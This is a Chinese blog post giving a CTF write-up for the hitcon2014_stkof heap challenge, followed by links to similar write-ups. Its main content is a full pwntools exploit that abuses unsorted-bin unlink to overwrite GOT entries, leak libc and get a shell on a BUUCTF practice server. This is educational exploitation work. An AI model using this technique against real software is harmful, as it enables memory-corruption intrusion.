hitcon2014_stkof(unsorted bin unlink)

最新推荐文章于 2024-01-28 08:16:53 发布
最新推荐文章于 2024-01-28 08:16:53 发布
阅读量822 收藏
点赞数 2
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105406240
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

hitcon2014_stkof

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,edit功能存在溢出。

程序没有show功能。

由于没有开启PIE,got表也可以修改,因此,我们利用unlink控制堆指针为got表,然后修改strlen的got表为puts的plt表,即可实现show的功能,进而泄露glibc地址,后续利用。

#coding:utf8
from pwn import *
from LibcSearcher import *

#sh = process('./stkof')
sh = remote('node3.buuoj.cn',27832)
elf = ELF('./stkof')
strlen_got = elf.got['strlen']
free_got = elf.got['free']
puts_plt = elf.plt['puts']
heap_ptr_addr = 0x0000000000602150

def add(size):
   sh.sendline('1')
   sh.sendline(str(size))
   sh.recvuntil('OK')

def edit(index,size,content):
   sh.sendline('2')
   sh.sendline(str(index))
   sh.sendline(str(size))
   sh.send(content)
   sh.recvuntil('OK')

def delete(index):
   sh.sendline('3')
   sh.sendline(str(index))
def show(index):
   sh.sendline('4')
   sh.sendline(str(index))
   sh.recvuntil('OK')

#1,消耗内存碎片,使得后面的chunk可以相邻
add(0x1000)
#2
add(0x80)
#3
add(0x80)
#4
add(0x10)
edit(4,0x8,'/bin/sh\x00')

#伪造好fd和bk,然后伪造好chunk3的prev、size
fake_chunk = p64(0) + p64(0x81)
fake_chunk += p64(heap_ptr_addr - 0x18) + p64(heap_ptr_addr - 0x10)
fake_chunk = fake_chunk.ljust(0x80,'a')
edit(2,0x90,fake_chunk + p64(0x80) + p64(0x90))
#unlink
delete(3)
#现在可以控制堆指针了
payload = p64(0) + p64(strlen_got) + p64(free_got)
edit(2,0x18,payload)
#修改strlen的got表为puts的plt表
edit(0,0x8,p64(puts_plt))
#泄露free的got表地址
show(1)
sh.recv(1)
free_addr = u64(sh.recv(6).ljust(8,'\x00'))
libc = LibcSearcher('free',free_addr)
libc_base = free_addr - libc.dump('free')
system_addr = libc_base + libc.dump('system')
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
#修改free的got表为system的地址
edit(1,0x8,p64(system_addr))
#getshell
delete(4)
sh.interactive()

 

ha1vk
关注
专栏目录
2014 HITCON stkof 的 exp
哒君的博客
07-23 512
思路借鉴于ctf-wiki,但ctf-wiki之中的思路较简略,且exp有一点疏忽的地方,故在此记录
2014 HITCON stkof writeup
Morphy_Amo的博客
01-24 2112
文章目录writeup 题目链接 1、查看安全策略 root@kali:~/ctf/Other/pwn/heap# checksec stkof [*] '/root/ctf/Other/pwn/heap/stkof' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 可以看
hitcon2014_stkof
z1r0的博客
12-27 294
hitcon2014_stkof 查看保护 在edit这个功能下可以输入size。没有对size进行判断,这里产生了溢出。 unlink即可。unlink控制堆指针为got表,接着就可以改got为puts,泄露出libc,改got为gadget或system。具体unlink知识看z1r0’s blog from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug =
[BUUCTF]PWN——hitcon2014_stkof
mcmuyanga的博客
01-18 833
hitcon2014_stkof 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下看看大概的情况, 64位ida载入,给程序的函数改了一下名,方便看,这是道堆,不过没有打印菜单 main(),v3=4的那个函数感觉没什么用,就不截图了 add() del() edit() 利用点在edit() 它向存储在s[v2]的这个数组中的指针开始的地址读入n数个字符(n由我们输入,可以溢出),也就是说,只要我们能够修改s[v2]中存的指针,就可以实现任意地址写。程序没有开启r
unlink 2014 HITCON stkof
九层台
08-03 607
这里有一个很坑的问题,ubuntu18和之前的版本堆的管理策略好像不太一样网上说的关于堆的策略的问题可能对ubuntu18有些不太适用。 所以环境就从原本的18改为了16 关于unlink的介绍参考https://ctf-wiki.github.io/ctf-wiki/pwn/heap/unlink/ http://yunnigu.dropsec.xyz/2017/04/05/%E5%A0%...
buuctf pwn hitcon2014_stkof 初识unlink
weixin_45677731的博客
08-02 748
最近开始学堆,看了wiki和一些大佬的文章搞懂了这个有关unlink的题目:hitcon2014_stkof 首先拖进ida,看看几个主要的函数: 函数1,创建对,同时可以看到,堆的地址被存储在了s处,点进去看看 发现是bss段,像这样的指针,就是这类题目的一个特征 函数2,编辑堆内容,长度可以自己设置,有堆溢出漏洞 函数3,free堆 函数4用处不大 先把三个函数写好: def alloc(size): sh.sendline('1') sh.sendline(str(size))
houseoforange_hitcon_2016(House of orange, unsorted bin attack,FSOP)
weixin_44145820的博客
04-27 1585
目录题目分析漏洞利用Exp 题目分析 只有添加,显示,编辑三个功能,没有删除 添加函数,最多只能添加四次,每次添加会依次执行malloc(0x10),malloc(name_size),calloc(8) House结构体如下 在编辑函数中,可以进行堆溢出,因为House没有把name的size保存下来 编辑次数最多为3 漏洞利用 Exp ...
houseoforange_hitcon_2016
fayinq的博客
04-07 270
houseoforange_hitcon_2016 先检查保护 保护全开 FSOP:对于_IO_FILE_plus结构体的利用 首先,在分析这个题目之前,我们需要知道两个知识点,一个是_IO_FILE_plus,一个是FSOP _IO_FILE_PLUS _IO_FILE_plus是ptmalloc中定义的一种结构体,他决定了很多东西,先在gdb里面查看一眼 在此,我们就用本次题目中会使用到的_IO_list_all结构体来作为参考。 _IO_FILE_plus 主要是由两个部分组成,其中一个是_IO
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019年HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
2014_hitcon_stkof
Maxmalloc的博客
12-13 865
题目链接 这是一道unlink的题,初学者可以通过它入门unlink 先大概了解一下unlink相关的知识点 unlink主要适用于small chunk(>=size>=0x80)和large chunk
hitcon_2014_stkof详解
像初雪一样自由洒落
04-20 1730
本文主要列出hitcon2014_stkof的详细过程 主要参考:unlink 系列 程序流程 allocate:分配一个指定size大小的块,返回idx。 其中块的指针信息保存在一个全局变量0x602140中 fill:根据idx找到对应的块,重新给定大小size,读入内容content free:释放idx的块 漏洞分析 由于fill时候的size可以重新制定,可以造成堆溢出。 没有打印函数 有一个全局变量 方法:unlink unlink,控制全局变量内容 修改chunk1指.
unlink小结 && 2014_hitcon_stkof
Pwnpanda的博客
08-02 1367
暑假学习计划 - 0x02 关于unlink的学习资料以及本例题的wp都很多,本篇主要是做个小总结,内附较为详细的调试图片以便初学者理解 (自从入了堆坑学unlink,到现在差不多一个半月了,真的是死去活来,也怪自己的基础差,现在算是理解一些了,先记下来等以后深入理解后再补充,在此感谢各位师傅的帮助,尤其是kaka师傅) 先放基础学习链接: Linux堆溢出漏洞利用之unlink http...
2014 HITCON——stkof
04-20 229
64位程序,没开PIE  #unlink 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 int v3; // eax 4 signed int v5; // [rsp+Ch] [rbp-74h] 5 char nptr; // [rsp+10h] [r...
[BUUCTF]-PWN:hitcon2014_stkof解析(unlink
最新发布
2301_79326813的博客
01-28 779
又是一道堆题,先看保护关键信息,64位,没开pie。再看ida大致就是alloc创建堆块,free释放堆块,fill填充堆块内容,以及一个看起来没啥用的函数,当然我也没利用这个函数去解题这里有两种解法。
unlink buuctf hitcon2014_stkof 个人粗浅理解
carol2358的博客
05-13 686
菜鸡终于对unlink有了些许的了解,写一下自己的理解,用来备份 unlink就是从双向链表中取出元素的行为 感谢网上的多篇前辈的文章,其中这篇让我收获最多 https://bbs.pediy.com/thread-247007.htm unlink 用来将一个双向链表(只存储空闲的 chunk)中的一个元素取出来,可能在以下地方使用 malloc 从恰好大小合适的 large bin 中获取 chunk。 这里需要注意的是 fastbin 与 small bin 就没有使用 unlink,这就是为什么漏
2014_hitcon_stkof学习
a2590035252的博客
08-29 964
适用于和我一样的广大pwn菜鸡
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值